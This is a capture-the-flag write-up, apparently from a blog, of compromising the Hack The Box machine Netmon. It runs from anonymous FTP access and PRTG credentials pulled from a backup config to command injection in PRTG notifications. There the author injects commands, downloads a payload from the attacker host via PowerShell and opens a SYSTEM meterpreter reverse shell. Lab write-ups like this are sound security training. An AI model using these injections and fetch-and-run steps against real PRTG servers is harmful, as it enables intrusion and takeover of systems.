HTB: Netmon

Details

This machine is Netmon from Hack The Box

Recon

Starting with an nmap scan to get a list of services

root@kali:~# nmap -T4 -sV -p- 10.10.10.152
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-02 23:00 GMT
Nmap scan report for 10.10.10.152
Host is up (0.033s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
80/tcp    open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Then let it run some scripts on it

root@kali:~# nmap -T4 -sVC 10.10.10.152
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-02 23:03 GMT
Nmap scan report for 10.10.10.152
Host is up (0.032s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_02-25-19  10:49PM       <DIR>          Windows
| ftp-syst:
|_  SYST: Windows_NT
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/ tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1m01s, deviation: 0s, median: -1m02s
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-03-02 23:02:32
|_  start_date: 2019-03-02 19:00:24
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.85 seconds

User Flag

The ftp looked interesting as it allowed anonymous access and seemed to be at the root of the file system

root@kali:~# ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-02-19  11:18PM                 1024 .rnd
02-25-19  09:15PM       <DIR>          inetpub
07-16-16  08:18AM       <DIR>          PerfLogs
02-25-19  09:56PM       <DIR>          Program Files
02-02-19  11:28PM       <DIR>          Program Files (x86)
02-03-19  07:08AM       <DIR>          Users
02-25-19  10:49PM       <DIR>          Windows
226 Transfer complete.

So I looked for if I could get the user flag for this

ftp> cd Users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-25-19  10:44PM       <DIR>          Administrator
02-02-19  11:35PM       <DIR>          Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  07:05AM       <DIR>          Documents
07-16-16  08:18AM       <DIR>          Downloads
07-16-16  08:18AM       <DIR>          Music
07-16-16  08:18AM       <DIR>          Pictures
02-02-19  11:35PM                   33 user.txt
07-16-16  08:18AM       <DIR>          Videos
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
33 bytes received in 0.03 secs (1.0345 kB/s)
root@kali:~# cat user.txt
[REDACTED]

Well user was easy

System Flag

So I dug a bit more, this time into the webserver and got to http://10.10.10.152/index.htm

Screenshot 1

A google search revealed it may be vulnerable to https://www.codewatch.org/blog/?p=453 but I'd need to be auth'd to do this, so I googled around and found out where the config files are stored, as I have ftp access I intended to take the config file to try and find creds, the search revealed the files would be in

/ProgramData/Paessler/PRTG Network Monitor
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-02-19  11:40PM       <DIR>          Configuration Auto-Backups
03-03-19  08:28PM       <DIR>          Log Database
02-02-19  11:18PM       <DIR>          Logs (Debug)
02-02-19  11:18PM       <DIR>          Logs (Sensors)
02-02-19  11:18PM       <DIR>          Logs (System)
03-03-19  08:28PM       <DIR>          Logs (Web Server)
03-03-19  08:33PM       <DIR>          Monitoring Database
02-25-19  09:54PM              1189697 PRTG Configuration.dat
02-25-19  09:54PM              1189697 PRTG Configuration.old
07-14-18  02:13AM              1153755 PRTG Configuration.old.bak
03-03-19  09:09PM              1679588 PRTG Graph Data Cache.dat
02-25-19  10:00PM       <DIR>          Report PDFs
02-02-19  11:18PM       <DIR>          System Information Database
02-02-19  11:40PM       <DIR>          Ticket Database
02-02-19  11:18PM       <DIR>          ToDo Database

So I took the interesting ones

PRTG Configuration.dat
PRTG Configuration.old
PRTG Configuration.old.bak

And inspected them, eventually in PRTG Configuration.old.bak

<dbpassword>
  <!-- User: prtgadmin -->
  PrTg@dmin2018
</dbpassword>

Some creds

prtgadmin:PrTg@dmin2018

I tried them on the website but it didn't work, I was confused for a bit, but then I thought, "Hey, it's not 2018 anymore" so I tried

prtgadmin:PrTg@dmin2019

Screenshot 2

So I setup the exploit found before, by going to

Setup -> Notifications -> new

And setup a new notification that executed a .ps1 with the following param

test.txt;mkdir C:\exp

Screenshot 3

And clicked on send demo notification

Screenshot 4

Screenshot 5

Using the ftp access I checked if the dir existed to verify the exploit was working

ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-02-19  11:18PM                 1024 .rnd
03-03-19  09:47PM       <DIR>          exp
02-25-19  09:15PM       <DIR>          inetpub
07-16-16  08:18AM       <DIR>          PerfLogs
02-25-19  09:56PM       <DIR>          Program Files
02-02-19  11:28PM       <DIR>          Program Files (x86)
02-03-19  07:08AM       <DIR>          Users
02-25-19  10:49PM       <DIR>          Windows
226 Transfer complete.

It had worked, so I set it up more, this time to

test.txt;whoami > C:\exp\whoami.txt

When I ran it I used ftp to get the results

ftp> cd exp
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-03-19  09:51PM                   44 whoami.txt
226 Transfer complete.
ftp> get whoami.txt
local: whoami.txt remote: whoami.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
44 bytes received in 0.28 secs (0.1521 kB/s)
root@kali:~# cat whoami.txt
��nt authority\system

So I have system, so I first used it to steal the flag by injecting

test.txt; type C:\Users\Administrator\Desktop\root.txt > C:\exp\root.txt
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-03-19  09:56PM                   70 root.txt
03-03-19  09:51PM                   44 whoami.txt
226 Transfer complete.
ftp> get root.txt
local: root.txt remote: root.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
70 bytes received in 0.03 secs (2.2908 kB/s)
root@kali:~# cat root.txt
[REDACTED]

I was now technically done, but I wanted a shell as system. So I generated a payload using phantom evasion, and used the RCE to pull it over by injecting

test.txt; powershell -Command "Invoke-WebRequest -Uri "http://10.10.14.24/rev.exe" -OutFile C:\exp\rev.exe"

Note: Looking back on this I could probably have just used FTP to put the payload on the target

Then setup a meterpreter handler

root@kali:~# msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set LHOST 10.10.14.24
LHOST => 10.10.14.24
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.24:4444

And finally injecting

test.txt; C:\exp\rev.exe

Which led to

[*] Started reverse TCP handler on 10.10.14.24:4444
[*] Sending stage (179779 bytes) to 10.10.10.152
[*] Meterpreter session 1 opened (10.10.14.24:4444 -> 10.10.10.152:63084) at 2019-03-04 03:06:45 +0000
meterpreter >

A shell

meterpreter > shell
Process 2628 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32>whoami
nt authority\system

And now I was done

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.